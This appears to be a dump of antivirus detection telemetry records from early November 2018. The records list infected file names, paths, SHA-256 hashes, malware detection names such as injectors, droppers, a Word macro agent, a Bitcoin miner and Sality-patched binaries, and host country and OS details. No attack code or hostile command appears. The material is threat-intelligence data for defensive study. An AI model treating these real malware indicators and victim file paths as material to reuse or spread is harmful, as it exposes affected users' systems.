  Row(detection=Row(filename='avscan-20181102-053658-498a5378', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053658-498A5378', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061358-7487f601', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061358-7487F601', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055632-04e9d709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055632-04E9D709', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055354-a6a35ffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055354-A6A35FFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061020-f249fd5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061020-F249FD5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050650-136910be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050650-136910BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060004-8371a7cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060004-8371A7CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054957-197313d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054957-197313D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060200-c878c360', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060200-C878C360', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055706-196bcebe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055706-196BCEBE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060916-cc60f582', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060916-CC60F582', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='844393847a1b655a9f2df69e63b820eebcd04b94635b5f5e3d63df7de3990aa6.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\844393847A1B655A9F2DF69E63B820EEBCD04B94635B5F5E3D63DF7DE3990AA6.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='844393847a1b655a9f2df69e63b820eebcd04b94635b5f5e3d63df7de3990aa6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:44:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053729-5b878c12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053729-5B878C12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055814-41ea3d5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055814-41EA3D5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053705-4d2797b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053705-4D2797B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050644-100b0730', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050644-100B0730', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053740-627fd2bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053740-627FD2BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061559-bc5ea66d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061559-BC5EA66D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060611-5e5bb2fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060611-5E5BB2FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050617-ffc4cc45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050617-FFC4CC45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055923-6b23f685', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055923-6B23F685', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051259-ef74f332', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051259-EF74F332', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055417-b49baa73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055417-B49BAA73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061527-a9c61d0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061527-A9C61D0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052641-d960c02a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052641-D960C02A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bahaya 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\IDENTIFIKASI BAHAYA 2015\\BAHAYA 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jobdesk.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\JOBDESK\\JOBDESK.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190734-b7ba7482', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-190537-9ECF88BD\\AVSCAN-20181101-190734-B7BA7482', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:07:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dance.exe', filepath='\\\\?\\D:\\Dance.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T19:08:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155117-9214bf0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155117-9214BF0E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\24DABBE3279F895D09D49475F6A79EB854ECC6C488038E22A9B5171DD4D069AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142132-18c9cbc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb904b13\\AVSCAN-20181101-142038-0F245C50\\AVSCAN-20181101-142132-18C9CBC9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:21:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:45:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='final.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\AUDIT RPG\\AUDIT AEON\\point 9\\qc final\\final.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155530-bca6f1c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155530-BCA6F1C1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='44f95b3635ef0851d461df529ae63747e7b923c9cf8d640198a3e85c4dc8e110', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T19:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\Temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T14:15:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095050-8e040ab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0714c40\\AVSCAN-20181101-095038-8BB12B2D\\AVSCAN-20181101-095050-8E040AB4', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:51:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T15:09:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124115-25827d7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ea3ea53\\AVSCAN-20181101-124102-2329A2C4\\AVSCAN-20181101-124115-25827D7D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:41:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110055-5d318771', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105548-25D20D21\\AVSCAN-20181101-110055-5D318771', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-27-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:47:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T21:19:00Z'), dt=datetime.date(2018, 11, 1)),
